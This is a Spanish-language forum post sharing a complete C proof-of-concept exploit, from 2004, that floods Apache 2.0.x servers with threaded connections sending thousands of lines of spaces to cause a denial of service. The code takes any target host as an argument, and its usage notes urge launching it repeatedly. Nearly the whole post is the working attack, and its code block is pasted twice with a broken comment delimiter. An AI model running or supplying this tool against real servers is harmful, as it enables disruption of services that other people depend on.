Autor
pruebenlo y espero comentarios....
Código:
/*
## [+] Apache/2.0.x and prior ( <= 2.0.x ) Remote Denial of Service (DoS)
## Proof of Concept
##
## [-] A. Alejandro Hernandez Hernandez <nitrous@hax0rs.biz>
## [-] http://nitrous.hax0rs.biz/
## [-] 13/nov/2004
##
## [*] Advisory: http://securitytracker.com/id?1012083
##
## How it works?:
## 100 Connections, and each one do:
##
## GET / HTTP/1.0\n
## [space]x7000\n
## [space]x7000\n
## [space]x7000\n
## ...
## 6000 times
##
## COMPILATION: $gcc apache_dos_xpl.c -o exploit -lpthread
## The flag -lpthread or -pthread IS NECESSARY !
## NOTE: Launch the exploit many times. I launched the exploit 7 or 8 times to
## fl00d my Apache/2.0.40 on Red Hat Linux 9.0
##
## gr33tz: VF Labs (www.vulnfact.com), #null people, #cum people, CRAc, t0wn3r,
## halo, dr_fdisk, flux, dex, ran, beavis...Tek brothers & systers ;)
*/
#include<stdio.h>
#include<string.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>
#include<pthread.h>
#define TOTAL_THREADS 100
#define SPACES 7000
char payl0ad[SPACES];
struct hostent *hostname;
void *attack(void *no_used)
{
struct sockaddr_in target;
int sokete,cont,sent_bytes=0;
char *request="GET / HTTP/1.0\n";
target.sin_family=AF_INET;
target.sin_addr=*((struct in_addr *)hostname->h_addr);
target.sin_port=htons(80);
bzero(&(target.sin_zero),8);
if((sokete=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
exit(-1);
}
if((connect(sokete,(struct sockaddr *)&target,sizeof(target)))==-1)
{
perror("connect()");
exit(-1);
}
send(sokete,request,strlen(request),0);
for(cont=1;cont<=6000;cont++)
send(sokete,payl0ad,strlen(payl0ad),0);
pthread_exit(NULL);
}
main(int argc,char **argv)
{
pthread_t threads[TOTAL_THREADS];
int aux,k;
if(argc!=2)
{
fprintf(stdout,"Usage: %s <target>\n",argv[0]);
exit(-1);
}
if((hostname=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname()");
exit(0);
}
printf("\t------------------------------------------------\n");
printf("\t Apache 2.0.x & < Remote DoS - Proof of Concept \n");
printf("\t------------------------------------------------\n");
printf("\nLaunching the Attack against %s...\n",argv[1]);
memset(payl0ad,0x20,SPACES); /* 0x20 = Hex value of Blank Space = ' ' */
payl0ad[SPACES-2]='\n';
payl0ad[SPACES-1]='\0';
for(k=0;k<TOTAL_THREADS;k++)
{
if((aux=pthread_create(&threads[k],NULL,attack,(void *)0)))
{
fprintf(stdout,"Error: pthread_create()\n\n");
exit(-1);
}
}
}
## [+] Apache/2.0.x and prior ( <= 2.0.x ) Remote Denial of Service (DoS)
## Proof of Concept
##
## [-] A. Alejandro Hernandez Hernandez <nitrous@hax0rs.biz>
## [-] http://nitrous.hax0rs.biz/
## [-] 13/nov/2004
##
## [*] Advisory: http://securitytracker.com/id?1012083
##
## How it works?:
## 100 Connections, and each one do:
##
## GET / HTTP/1.0\n
## [space]x7000\n
## [space]x7000\n
## [space]x7000\n
## ...
## 6000 times
##
## COMPILATION: $gcc apache_dos_xpl.c -o exploit -lpthread
## The flag -lpthread or -pthread IS NECESSARY !
## NOTE: Launch the exploit many times. I launched the exploit 7 or 8 times to
## fl00d my Apache/2.0.40 on Red Hat Linux 9.0
##
## gr33tz: VF Labs (www.vulnfact.com), #null people, #cum people, CRAc, t0wn3r,
## halo, dr_fdisk, flux, dex, ran, beavis...Tek brothers & systers ;)
*/
#include<stdio.h>
#include<string.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<netdb.h>
#include<pthread.h>
#define TOTAL_THREADS 100
#define SPACES 7000
char payl0ad[SPACES];
struct hostent *hostname;
void *attack(void *no_used)
{
struct sockaddr_in target;
int sokete,cont,sent_bytes=0;
char *request="GET / HTTP/1.0\n";
target.sin_family=AF_INET;
target.sin_addr=*((struct in_addr *)hostname->h_addr);
target.sin_port=htons(80);
bzero(&(target.sin_zero),8);
if((sokete=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
exit(-1);
}
if((connect(sokete,(struct sockaddr *)&target,sizeof(target)))==-1)
{
perror("connect()");
exit(-1);
}
send(sokete,request,strlen(request),0);
for(cont=1;cont<=6000;cont++)
send(sokete,payl0ad,strlen(payl0ad),0);
pthread_exit(NULL);
}
main(int argc,char **argv)
{
pthread_t threads[TOTAL_THREADS];
int aux,k;
if(argc!=2)
{
fprintf(stdout,"Usage: %s <target>\n",argv[0]);
exit(-1);
}
if((hostname=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname()");
exit(0);
}
printf("\t------------------------------------------------\n");
printf("\t Apache 2.0.x & < Remote DoS - Proof of Concept \n");
printf("\t------------------------------------------------\n");
printf("\nLaunching the Attack against %s...\n",argv[1]);
memset(payl0ad,0x20,SPACES); /* 0x20 = Hex value of Blank Space = ' ' */
payl0ad[SPACES-2]='\n';
payl0ad[SPACES-1]='\0';
for(k=0;k<TOTAL_THREADS;k++)
{
if((aux=pthread_create(&threads[k],NULL,attack,(void *)0)))
{
fprintf(stdout,"Error: pthread_create()\n\n");
exit(-1);
}
}
}
En línea
...
